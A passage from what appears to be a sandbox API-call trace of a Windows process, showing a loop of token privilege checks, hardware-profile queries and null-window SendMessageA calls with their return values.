pHWProfileInfo=0x0) returned 0x3 [0085.051] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.051] GetCurrentThread () returned 0xfffffffe [0085.051] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.051] GetLastError () returned 0x3f0 [0085.051] GetCurrentProcess () returned 0xffffffff [0085.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.051] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.051] SetLastError (dwErrCode=0x522) [0085.051] CloseHandle (hObject=0x114) returned 1 [0085.051] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.052] GetLastError () returned 0x578 [0085.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.052] GetCurrentThread () returned 0xfffffffe [0085.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.052] GetLastError () returned 0x3f0 [0085.052] GetCurrentProcess () returned 0xffffffff [0085.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.052] SetLastError (dwErrCode=0x522) [0085.052] CloseHandle (hObject=0x114) returned 1 [0085.052] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.052] GetLastError () returned 0x578 [0085.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.052] GetCurrentThread () returned 0xfffffffe [0085.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.052] GetLastError () returned 0x3f0 [0085.052] GetCurrentProcess () returned 0xffffffff [0085.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.052] SetLastError (dwErrCode=0x522) [0085.052] CloseHandle (hObject=0x114) returned 1 [0085.052] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.052] GetLastError () returned 0x578 [0085.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.052] GetCurrentThread () returned 0xfffffffe [0085.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.052] GetLastError () returned 0x3f0 [0085.052] GetCurrentProcess () returned 0xffffffff [0085.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.052] SetLastError (dwErrCode=0x522) [0085.052] CloseHandle (hObject=0x114) returned 1 [0085.052] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.052] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.052] GetLastError () returned 0x578 [0085.052] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.052] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.052] GetCurrentThread () returned 0xfffffffe [0085.052] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.052] GetLastError () returned 0x3f0 [0085.052] GetCurrentProcess () returned 0xffffffff [0085.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.052] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.052] SetLastError (dwErrCode=0x522) [0085.053] CloseHandle (hObject=0x114) returned 1 [0085.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.053] GetLastError () returned 0x578 [0085.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.053] GetCurrentThread () returned 0xfffffffe [0085.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.053] GetLastError () returned 0x3f0 [0085.053] GetCurrentProcess () returned 0xffffffff [0085.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.053] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.053] SetLastError (dwErrCode=0x522) [0085.053] CloseHandle (hObject=0x114) returned 1 [0085.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.053] GetLastError () returned 0x578 [0085.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.053] GetCurrentThread () returned 0xfffffffe [0085.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.053] GetLastError () returned 0x3f0 [0085.053] GetCurrentProcess () returned 0xffffffff [0085.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.053] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.053] SetLastError (dwErrCode=0x522) [0085.053] CloseHandle (hObject=0x114) returned 1 [0085.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.053] GetLastError () returned 0x578 [0085.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.053] GetCurrentThread () returned 0xfffffffe [0085.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.053] GetLastError () returned 0x3f0 [0085.053] GetCurrentProcess () returned 0xffffffff [0085.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.053] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.053] SetLastError (dwErrCode=0x522) [0085.053] CloseHandle (hObject=0x114) returned 1 [0085.053] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.053] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.053] GetLastError () returned 0x578 [0085.053] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.053] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.053] GetCurrentThread () returned 0xfffffffe [0085.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.053] GetLastError () returned 0x3f0 [0085.053] GetCurrentProcess () returned 0xffffffff [0085.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.054] SetLastError (dwErrCode=0x522) [0085.054] CloseHandle (hObject=0x114) returned 1 [0085.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.054] GetLastError () returned 0x578 [0085.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.054] GetCurrentThread () returned 0xfffffffe [0085.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.054] GetLastError () returned 0x3f0 [0085.054] GetCurrentProcess () returned 0xffffffff [0085.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.054] SetLastError (dwErrCode=0x522) [0085.054] CloseHandle (hObject=0x114) returned 1 [0085.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.054] GetLastError () returned 0x578 [0085.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.054] GetCurrentThread () returned 0xfffffffe [0085.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.054] GetLastError () returned 0x3f0 [0085.054] GetCurrentProcess () returned 0xffffffff [0085.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.054] SetLastError (dwErrCode=0x522) [0085.054] CloseHandle (hObject=0x114) returned 1 [0085.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.054] GetLastError () returned 0x578 [0085.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.054] GetCurrentThread () returned 0xfffffffe [0085.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.054] GetLastError () returned 0x3f0 [0085.054] GetCurrentProcess () returned 0xffffffff [0085.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.054] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.054] SetLastError (dwErrCode=0x522) [0085.054] CloseHandle (hObject=0x114) returned 1 [0085.054] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.054] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.054] GetLastError () returned 0x578 [0085.054] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.054] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.055] GetCurrentThread () returned 0xfffffffe [0085.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.055] GetLastError () returned 0x3f0 [0085.055] GetCurrentProcess () returned 0xffffffff [0085.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.055] SetLastError (dwErrCode=0x522) [0085.055] CloseHandle (hObject=0x114) returned 1 [0085.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.055] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.055] GetLastError () returned 0x578 [0085.055] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.055] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.055] GetCurrentThread () returned 0xfffffffe [0085.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.055] GetLastError () returned 0x3f0 [0085.055] GetCurrentProcess () returned 0xffffffff [0085.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.055] SetLastError (dwErrCode=0x522) [0085.055] CloseHandle (hObject=0x114) returned 1 [0085.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.055] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.055] GetLastError () returned 0x578 [0085.055] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.055] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.055] GetCurrentThread () returned 0xfffffffe [0085.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.055] GetLastError () returned 0x3f0 [0085.055] GetCurrentProcess () returned 0xffffffff [0085.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.055] SetLastError (dwErrCode=0x522) [0085.055] CloseHandle (hObject=0x114) returned 1 [0085.055] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.055] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.055] GetLastError () returned 0x578 [0085.055] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.055] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.055] GetCurrentThread () returned 0xfffffffe [0085.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.055] GetLastError () returned 0x3f0 [0085.055] GetCurrentProcess () returned 0xffffffff [0085.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.055] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.055] SetLastError (dwErrCode=0x522) [0085.055] CloseHandle (hObject=0x114) returned 1 [0085.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.056] GetLastError () returned 0x578 [0085.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.056] GetCurrentThread () returned 0xfffffffe [0085.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.056] GetLastError () returned 0x3f0 [0085.056] GetCurrentProcess () returned 0xffffffff [0085.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.056] SetLastError (dwErrCode=0x522) [0085.056] CloseHandle (hObject=0x114) returned 1 [0085.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.056] GetLastError () returned 0x578 [0085.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.056] GetCurrentThread () returned 0xfffffffe [0085.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.056] GetLastError () returned 0x3f0 [0085.056] GetCurrentProcess () returned 0xffffffff [0085.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.056] SetLastError (dwErrCode=0x522) [0085.056] CloseHandle (hObject=0x114) returned 1 [0085.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.056] GetLastError () returned 0x578 [0085.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.056] GetCurrentThread () returned 0xfffffffe [0085.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.056] GetLastError () returned 0x3f0 [0085.056] GetCurrentProcess () returned 0xffffffff [0085.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.056] SetLastError (dwErrCode=0x522) [0085.056] CloseHandle (hObject=0x114) returned 1 [0085.056] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.056] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.056] GetLastError () returned 0x578 [0085.056] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.056] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.056] GetCurrentThread () returned 0xfffffffe [0085.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.056] GetLastError () returned 0x3f0 [0085.056] GetCurrentProcess () returned 0xffffffff [0085.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.056] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.057] SetLastError (dwErrCode=0x522) [0085.057] CloseHandle (hObject=0x114) returned 1 [0085.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.057] GetLastError () returned 0x578 [0085.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.057] GetCurrentThread () returned 0xfffffffe [0085.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.057] GetLastError () returned 0x3f0 [0085.057] GetCurrentProcess () returned 0xffffffff [0085.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.057] SetLastError (dwErrCode=0x522) [0085.057] CloseHandle (hObject=0x114) returned 1 [0085.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.057] GetLastError () returned 0x578 [0085.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.057] GetCurrentThread () returned 0xfffffffe [0085.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.057] GetLastError () returned 0x3f0 [0085.057] GetCurrentProcess () returned 0xffffffff [0085.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.057] SetLastError (dwErrCode=0x522) [0085.057] CloseHandle (hObject=0x114) returned 1 [0085.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.057] GetLastError () returned 0x578 [0085.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, 